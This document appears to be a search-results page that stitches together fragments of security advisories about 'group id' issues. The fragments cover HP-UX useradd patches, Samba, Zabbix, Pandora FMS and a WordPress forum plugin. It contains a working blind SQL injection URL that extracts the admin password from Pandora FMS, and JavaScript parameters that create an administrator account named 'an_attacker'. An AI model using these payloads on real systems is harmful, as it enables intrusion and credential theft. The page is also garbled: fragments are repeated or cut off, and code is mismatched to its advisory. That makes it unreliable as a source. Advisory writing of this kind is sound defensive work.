| New User, Welcome! Login |
group id
The patches correct the useradd behavior for the following cases:
* The /etc/default/useradd template file is missing
* The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file
MANUAL ACTIONS: Yes
All user accounts should be verified for proper GROUPID and correct HOMEDIR entries.
PRODUCT SPECIFIC INFORMATION
The patches correct the useradd behavior for the following cases:
* The /etc/default/useradd template file is missing
* The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file
MANUAL ACTIONS: Yes
All user accounts should be verified for proper GROUPID and correct HOMEDIR entries.
PRODUCT SPECIFIC INFORMATION
The patches affect the useradd(1M) behavior for the following cases:
* The /etc/default/useradd template file is missing
* The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file
MANUAL ACTIONS: Yes - NonUpdate
Verify group id and home directory for all accounts
+++ b/configure.ac
@@ -107,6 +107,7 @@ AC_CHECK_FUNCS(_getpty cgetent getcwd getenv gettosbyname getusershell getutmp)
AC_CHECK_FUNCS(getutmpx grantpt inet_aton initgroups isatty killpg killpg)
AC_CHECK_FUNCS(line_push ptsname revoke rmufile rresvport_af)
AC_CHECK_FUNCS(seteuid setlogin setpgid setpriority setresuid setreuid)
+AC_CHECK_FUNCS(setegid setregid setresgid)
AC_CHECK_FUNCS(setutent setutsent setutxent strsave tcgetpgrp tcsetpgrp)
AC_CHECK_FUNCS(ttyname unsetenv updwtmp updwtmpx utimes utmpname utmpxname)
AC_CHECK_FUNCS(vhangup vsnprintf waitpid)
diff --git a/gssftp/ftpd/ftpd.c b/gssftp/ftpd/ftpd.c
index fe62a9c..a150819 100644
The corrupt /etc/default/useradd template file can cause accounts to be created with incorrect ownership and permissions.
The patches insure that useradd(1M) options are processed correctly in all cases.
MANUAL ACTIONS: Yes - NonUpdate
Verify group id and home directory for all accounts
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
Description
===========
The idmap_ad.so library provides an nss_info extension to Winbind
for retrieving a user's home directory path, login shell and
primary group id from an Active Directory domain controller. This
functionality is enabled by defining the "winbind nss info"
smb.conf option to either "sfu" or "rfc2307".
Both the Windows "Identity Management for Unix" and "Services for
Unix" MMC plug-ins allow a user to be assigned a primary group
var params = {
'username' : 'an_attacker',
'firstname' : 'attack',
'lastname' : 'user',
'email' : 'some.user@randomatackerdomain.com',
'user_group_id' : '1', //Default group id for administrator level is 1
'password' : 'test',
'confirm' : 'test',
'status' : '1'
};
filter against sql injection. A proper fix is planned for a major version.
4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10
The parameter group_id of operation/agentes/estado_agente.php is
vulnerable to blind sql injection.
PoC:
http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281
Debian-specific: no
CVE ID : CVE-2007-6210
Debian Bug : 452682
Bas van Schaik discovered that the agentd process of Zabbix, a network
monitor system, may run user-supplied commands as group id root, not
zabbix, which may lead to a privilege escalation.
For the stable distribution (etch), this problem has been fixed in version
1:1.1.4-10etch1
https://issues.rpath.com/browse/RPL-1705
Description:
Previous versions of the samba package contain a Privilege Escalation
vulnerability in which Windows users may, under some circumstances,
incorrectly be assigned a primary group id of 0 (root).
In its default configuration, rPath Linux 1 is not vulnerable to this
Privilege Escalation.
Copyright 2007 rPath, Inc.
Vulnerability Type: SQL Injection
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "/wp-content/plugins/wpforum/wp-forum.php" script to properly sanitize user-supplied input in "group_id" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
The following PoC is available:
> --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
>
> $fields=array(
> "config"=> array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
> // actions
> "groupid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
> "hostid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
> "start"=> array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
> PAGE_SIZE."==0)", NULL),
> "next"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
> "prev"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$fields=array(
"config"=> array(T_ZBX_INT, O_OPT, P_SYS, IN("0,1"), NULL),
// actions
"groupid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"hostid"=> array(T_ZBX_INT, O_OPT, P_SYS|P_NZERO, DB_ID, NULL),
"start"=> array(T_ZBX_INT, O_OPT, P_SYS, BETWEEN(0,65535)."({}%".
PAGE_SIZE."==0)", NULL),
"next"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
"prev"=> array(T_ZBX_STR, O_OPT, P_SYS, NULL, NULL),
|
|
|
